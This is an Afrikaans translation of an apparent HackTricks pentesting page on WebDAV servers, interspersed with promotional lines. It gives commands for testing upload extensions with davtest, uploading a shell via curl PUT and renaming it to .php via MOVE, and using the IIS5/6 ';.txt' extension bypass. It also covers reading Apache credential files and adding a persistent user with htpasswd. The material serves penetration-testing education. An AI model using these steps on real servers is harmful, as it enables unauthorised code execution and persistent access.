WebDav

Gebruik Trickest om maklik werkstrome te bou en te outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente. Kry Toegang Vandag:

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Wanneer jy te make het met 'n HTTP-bediener met WebDav wat geaktiveer is, is dit moontlik om lêers te manipuleer as jy die regte geloofsbriewe het, gewoonlik geverifieer deur HTTP Basiese Verifikasie. Die verkryging van beheer oor so 'n bediener behels dikwels die oplaai en uitvoer van 'n webshell.

Toegang tot die WebDav-bediener vereis tipies geldige geloofsbriewe, met WebDav-bruteforce wat 'n algemene metode is om dit te bekom.

Om beperkings op lêeroplaais te oorkom, veral dié wat die uitvoer van bedienerkant-skripte voorkom, kan jy:

  • Lêers oplaai met uitvoerbare uitbreidings direk as dit nie beperk word nie.

  • Hernoem oplaai nie-uitvoerbare lêers (soos .txt) na 'n uitvoerbare uitbreiding.

  • Kopieer oplaai nie-uitvoerbare lêers en verander hul uitbreiding na een wat uitvoerbaar is.

DavTest

Davtest probeer om verskeie lêers met verskillende uitbreidings te oplaai en te toets of die uitbreiding uitgevoer word:

davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension

Afleweringsvoorbeeld:

Dit beteken nie dat .txt en .html-uitbreidings uitgevoer word nie. Dit beteken dat jy hierdie lêers kan bereik via die web.

Cadaver

Jy kan hierdie instrument gebruik om aan die WebDav-bediener te koppel en handelinge (soos oplaai, skuif of verwyder) handmatig uit te voer.

cadaver <IP>

PLAAS AANVRAAG

curl -T 'shell.txt' 'http://$ip'

SKUIF versoek

curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'

Gebruik Trickest om maklik werkstrome te bou en outomatiseer met die wêreld se mees gevorderde gemeenskapsinstrumente. Kry Toegang Vandag:

IIS5/6 WebDav Swakheid

Hierdie swakheid is baie interessant. Die WebDav staan nie toe om lêers met die uitbreiding .asp te oplaai of hernoem nie. Maar jy kan dit verbygaan deur aan die einde van die naam ";.txt" by te voeg en die lêer sal uitgevoer word asof dit 'n .asp-lêer was (jy kan ook ".html" in plaas van ".txt" gebruik, maar moet die ";" nie vergeet nie).

Daarna kan jy jou dop as 'n ".txt-lêer" oplaai en dit na 'n ".asp;.txt" lêer kopieer/verskuif. Deur daardie lêer via die webbediener te benader, sal dit uitgevoer word (cadaver sal sê dat die skuifaksie nie gewerk het nie, maar dit het).

Pos-gedragsbewyse

As die Webdav 'n Apache-bediener gebruik het, moet jy kyk na gekonfigureerde webwerwe in Apache. Gewoonlik: /etc/apache2/sites-enabled/000-default

Binne-in kan jy iets soos dit vind:

ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user

Soos u kan sien, is daar die lêers met die geldige gelde vir die webdav-bediener:

/etc/apache2/users.password

Binne hierdie tipe lêers sal jy die gebruikersnaam en 'n hash van die wagwoord vind. Dit is die geloofsbriewe wat die webdav-bediener gebruik om gebruikers te verifieer.

Jy kan probeer om hulle te kraak, of om meer by te voeg as jy om enige rede die webdav-bediener wil toegang verkry:

htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password

Om te kontroleer of die nuwe geloofsbriewe werk, kan jy doen:

wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q

Verwysings

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Gebruik Trickest om maklik te bou en werkstrome outomatiseer wat aangedryf word deur die wêreld se mees gevorderde gemeenskapshulpmiddels. Kry Vandaag Toegang:

Last updated